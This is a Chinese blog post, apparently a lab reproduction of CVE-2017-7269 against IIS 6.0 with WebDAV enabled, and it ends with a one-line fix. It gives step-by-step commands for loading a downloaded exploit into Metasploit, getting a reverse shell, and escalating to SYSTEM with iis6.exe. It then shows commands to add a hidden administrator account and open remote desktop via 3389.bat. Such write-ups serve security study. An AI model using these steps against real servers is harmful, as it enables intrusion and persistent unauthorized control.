IIS_CVE-2017-7269 IIS6.0远程代码执行漏洞复现——踩坑记

一、漏洞描述

IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁。

二、影响版本以及利用条件

Windows 2003 R2开启WebDAV服务的IIS6.0

三、漏洞环境搭建

Windows server 2003 R2 安装IIS服务,并且开启了WebDAV
Exp下载地址:https://github.com/zcgonvh/cve-2017-7269
IIS6.exe提权工具
3389.bat

四、漏洞复现

1.IIS开启WebDAV
在这里插入图片描述
工具检测存在CVE-2017-7269漏洞
在这里插入图片描述

2.github下载exp

Exp下载地址:https://github.com/zcgonvh/cve-2017-7269

3.把exp放入到msf中,#注意模块的命名名称,单词之间加下划线

这个地方有个坑,下载的exp:cve-2017-7269 直接放在metasploit中是不能加载识别的,得把cve-2017-7269修改为cve_2017_7269
将桌面上的cve_2017_7269.rb复制到/usr/share/metasploit-framework/modules/exploits/windows/iis/目录下
命令:cp /root/桌面/cve_2017_7269.rb /usr/share/metasploit-framework/modules/exploits/windows/iis/

给cve_2017_7269.rb执行权限
在这里插入图片描述
打开metasploit重新加载exp模块,加载完模块之后,exp数量会增加1
在这里插入图片描述
4.使用模块,设置参数
在这里插入图片描述
设置参数模块如下设置即可
忘记截图了一个,还有一个命令:set lhost 192.168.36.129(kali地址)
在这里插入图片描述
返回shell,查看当前用户权限,发现是一般用户权限
在这里插入图片描述
cd到网站目录,寻找一个可以创建文件夹的目录,一个一个寻找
在这里插入图片描述
按Ctrl + C退出shell,输出y
在这里插入图片描述

利用Metasploit的上传功能,把提权工具iis6.exe上传到刚刚新建的文件里(提权工具有很多,iis6.exe,pr.exe等等)
在这里插入图片描述
又回到shell里面确定工具上传是否成功
在这里插入图片描述

在这里插入图片描述
利用工具进行提权,命令:iis6.exe “whoami”,已经是system权限了
在这里插入图片描述
进行新建用户,iis6.exe “net user xiaohua xiaohua123 /add”
在这里插入图片描述
添加用户到管理员,iis6.exe “net localhost administrators xiaohua /add”
在这里插入图片描述
查看远程连接是否打开,没有打开,命令:netstat -an
在这里插入图片描述
再上传一个开3389.bat,利用iis6.exe运行,打开目标机的3389端口(上传3389.bat的方法和上面iis6.exe上传方法一样)

命令:iis6.exe “3389.bat”
在这里插入图片描述
查看是否打开,netstat -an,已经成功打开
在这里插入图片描述
进行远程连接
在这里插入图片描述

五、修复建议

禁用WebDAV

更多web安全工具与存在漏洞的网站搭建源码,收集整理在知识星球。
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值